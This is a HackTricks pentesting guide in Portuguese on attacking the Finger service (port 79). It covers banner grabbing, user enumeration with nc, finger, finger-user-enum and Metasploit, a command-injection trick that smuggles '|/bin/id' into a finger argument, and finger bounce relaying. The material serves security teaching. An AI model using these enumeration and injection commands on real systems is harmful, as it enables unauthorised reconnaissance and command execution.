# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **Informações Básicas** O programa/serviço **Finger** é utilizado para recuperar detalhes sobre usuários de computador. Normalmente, as informações fornecidas incluem o **nome de login do usuário, nome completo**, e, em alguns casos, detalhes adicionais. Esses detalhes extras podem incluir a localização do escritório e o número de telefone (se disponível), o horário em que o usuário fez login, o período de inatividade (tempo ocioso), a última vez que o e-mail foi lido pelo usuário e o conteúdo dos arquivos de plano e projeto do usuário. **Porta padrão:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Enumeração** ### **Captura de Banner/Conexão Básica** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Enumeração de usuários** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternativamente, você pode usar **finger-user-enum** do [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), alguns exemplos: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap executa um script para fazer usando scripts padrão** ### Metasploit usa mais truques do que o Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## Execução de comando ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Use um sistema como um relay de finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}